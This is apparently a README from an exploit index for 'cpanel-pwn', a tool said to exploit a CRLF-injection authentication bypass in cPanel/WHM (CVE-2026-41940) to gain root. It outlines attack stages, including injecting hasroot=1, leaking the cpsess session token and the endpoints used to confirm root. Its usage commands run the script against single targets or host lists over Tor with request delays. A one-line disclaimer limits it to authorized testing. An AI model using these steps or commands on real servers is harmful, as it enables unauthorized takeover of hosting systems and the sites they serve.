## https://sploitus.com/exploit?id=8F486651-6CB4-54B6-8532-9AE328F49A9F
# cpanel-pwn
cPanel/WHM security testing toolkit. Implements the CVE-2026-41940 CRLF injection
authentication bypass and post-exploitation privilege pivoting.
## Tools
| Script | Purpose |
|--------|---------|
| `cpanel_exploit.py` | CVE-2026-41940: CRLF injection โ WHM auth bypass โ root access |
## CVE-2026-41940
**Type:** CRLF Injection โ Authentication Bypass โ Root RCE
**Affected:** cPanel/WHM โ injects hasroot=1, leaks cpsess token
Stage 3: GET /scripts2/listaccts โ fires session-cache propagation gadget
Stage 4: GET /cpsess[TOKEN]/json-api/version โ HTTP 200 + version = ROOT ACCESS
```
## Usage
```bash
pip install requests
python cpanel_exploit.py -t target.com
python cpanel_exploit.py -l whm_hosts.txt --tor --delay 2
python cpanel_exploit.py -t target.com --verify-only # CRLF check only, no priv-esc
```
## Authorization
For authorized penetration testing only.